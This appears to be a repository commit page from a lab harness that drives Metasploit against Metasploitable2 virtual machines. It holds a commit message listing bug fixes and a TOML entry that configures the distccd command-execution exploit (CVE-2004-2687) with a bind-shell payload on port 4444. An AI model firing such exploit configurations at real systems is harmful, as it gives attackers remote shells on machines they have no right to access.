Elliott Kolden
b73f5559dc
Bug 10: _wait_for_tcp returned on recv()→b'' (connection closed by peer),
falsely signalling service-ready. Only socket.timeout or non-empty data
are genuine ready signals; b'' now retries.
Bug 11: distccd_command_exec and unreal_ircd_3281_backdoor incorrectly
had requires_bridge=true. bind_perl payloads connect inward (host→guest
via hostfwd), not outward — no bridge egress needed. Both modules now
run on SLIRP-only fleet slots.
Bug 12: msgpack.unpackb crashed on integer session IDs from msfrpcd 6.x
(strict_map_key=True default). Added strict_map_key=False.
Bug 13 (documented): samba_usermap_script removed from catalog (NoReply
on every fire — already handled in dca6144 on origin/main).
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
34 lines
1 KiB
TOML
34 lines
1 KiB
TOML
description = """
|
|
distccd v1 unauthenticated command execution (CVE-2004-2687). The
|
|
distcc daemon doesn't verify the source of compile jobs, so a
|
|
crafted DCC_CMD-style request runs an arbitrary command as the
|
|
distccd user. Metasploitable2 ships distccd 2.18.3 listening on
|
|
3632. Returns a low-priv shell — paired with a privesc later if
|
|
needed; for envelope work the unprivileged shell is enough.
|
|
"""
|
|
|
|
[module]
|
|
type = "exploit"
|
|
path = "unix/misc/distcc_exec"
|
|
|
|
[module.options]
|
|
RHOSTS = "{{ target_ip }}"
|
|
RPORT = 3632
|
|
|
|
[payload]
|
|
# Bind shell on a fixed in-guest port. The host hostfwds this port
|
|
# (see runtime.extra_target_ports) so msfrpcd can connect to it
|
|
# from the loopback side. Avoids the SLIRP+restrict=on dead-end the
|
|
# reverse_tcp payload hits.
|
|
path = "cmd/unix/bind_perl"
|
|
[payload.options]
|
|
LPORT = 4444
|
|
|
|
[session]
|
|
type = "shell"
|
|
|
|
[runtime]
|
|
# bind_perl opens a new guest port; fleet hostfwds it via SLIRP.
|
|
# No bridge egress needed — host connects in, not guest out.
|
|
requires_bridge = false
|
|
extra_target_ports = [4444]
|